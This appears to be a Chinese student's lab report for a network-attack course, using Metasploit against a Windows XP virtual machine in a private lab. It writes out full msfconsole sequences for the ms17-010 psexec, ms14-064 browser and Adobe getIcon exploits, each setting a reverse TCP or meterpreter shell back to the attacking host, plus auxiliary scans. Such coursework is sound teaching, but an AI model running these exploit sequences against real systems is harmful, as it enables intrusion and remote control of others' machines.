2018-2019 20165237網絡對抗 Exp5 MSF基礎應用

2018-2019 20165237網絡對抗 Exp5 MSF基礎應用


實驗目標

  • 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
  • 一個主動攻擊實踐,如ms08-067; (1分)

ms17_010_psexec(√) 不惟一shell

  • 一個針對瀏覽器的攻擊,如ms11-050;(1分)

ms14_064_ole_lode_execution(√)不惟一windows

  • 一個針對客戶端的攻擊,如Adobe;(1分)
  • adobe_geticon(√) 惟一
  • 成功應用任何一個輔助模塊。(0.5分)

scanner/http/ssl_version(√)不惟一瀏覽器

scanner/portscan/tcp (√)不惟一網絡

scanner/oracle/tnslsnr_version (√)惟一session

  • 以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。

Exp 5.1 一個主動攻擊實踐-ms17-010

  • 攻擊機:Kali(IP地址:192.168.153.135)
  • 靶機: windows XP(IP地址:192.168.153.136)
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > show payloads
msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回連
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻擊機ip
msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻擊端口
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶機ip,特定漏洞端口已經固定
msf exploit(windows/smb/ms17_010_psexec) > run //攻擊

  • 攻擊成功以下:

Exp 5.2 對瀏覽器的攻擊 ms14_064

  • 攻擊機:Kali(IP地址:192.168.153.135)
  • 靶機: windows XP(IP地址:192.168.153.136)
msfconsole
msf > use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp //http反向回連
set LHOST 192.168.153.135//攻擊機ip
set Lport 5237//攻擊端口固定
exploit //攻擊
  • 能夠看到生成的一個URL:http://192.168.153.135:8080/YT1IHT
    oracle

  • 在XP的IE上點開後:
    tcp

  • 回到Kali,查看sessions,輸入sessions -i 4後,發現攻擊成功,得到shell功能
    編碼


Exp 5.3 針對Adobe Reader軟件的滲透攻擊-adobe-geticon

  • 攻擊機:Kali(IP地址:192.168.153.135)
  • 靶機: windows XP(IP地址:192.168.153.136)
    -依次輸入如下指令:
search Adobe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
set filename 20165237.pdf
exploit


  • 找到pdf文件(要打開顯示隱藏文件選項)3d

  • 接着輸入如下代碼
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
exploit
  • 接着在xp中點開pdf文件,回到kali,發現回傳了一些東西。


    code

  • 查看sessions,輸入session -i 1,發現攻擊成功,可使用shell。


Exp 5.4 輔助功能攻擊-tcp+ssl_version+tnslsnr_version

  • 攻擊機:Kali(IP地址:192.168.153.135)
  • 靶機: windows XP(IP地址:192.168.153.136)
  • 輸入search auxiliary
  • 選擇其中一個進行使用(其實我試了不少,成功的也挺多,可是和以前的人重複,因此我就多用了幾個,可能會重複,可是我以爲效果很好)
  • tcp掃描成功:

  • ssl版本模塊掃描成功:

  • OracleSQL的監聽服務攻擊成功:


實驗感想和問題

  • 用本身的話解釋什麼是exploit,payload,encode?

exploit:針對靶機的漏洞,利用靶機中的後門,對靶機進行攻擊。

payload:能夠實現任何運行在受害者環境中的程序所能作的事情,而且可以執行動做包括破壞文件刪除文件,向病毒的做者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。說白了就是傳送到靶機上的用來攻擊的惡意代碼。

encode:對payload進行編碼

  • 離實戰還缺些什麼技術或步驟?
    一、在實踐中發現MSF攻擊的侷限性很大,其中的漏洞幾乎都是針對win XP系統,而實際應用的系統大部分是win7及以上的系統,若是須要實戰攻擊win7及以上的系統,還須要不斷髮現併成功利用新的漏洞。
    二、須要提升掃描等信息收集技術,信息收集是作攻擊的重要前提,但大多數初級的掃描都會被win7及以上的系統發現甚至拒絕,因此提供相應的技術很重要。

  • 感想:

此次實驗花費了不少時間去查找能攻擊成功的漏洞,可是讓我對於msf更加熟練,甚至更加崇拜,但願之後可以使用它更多的領域。

相關文章
相關標籤/搜索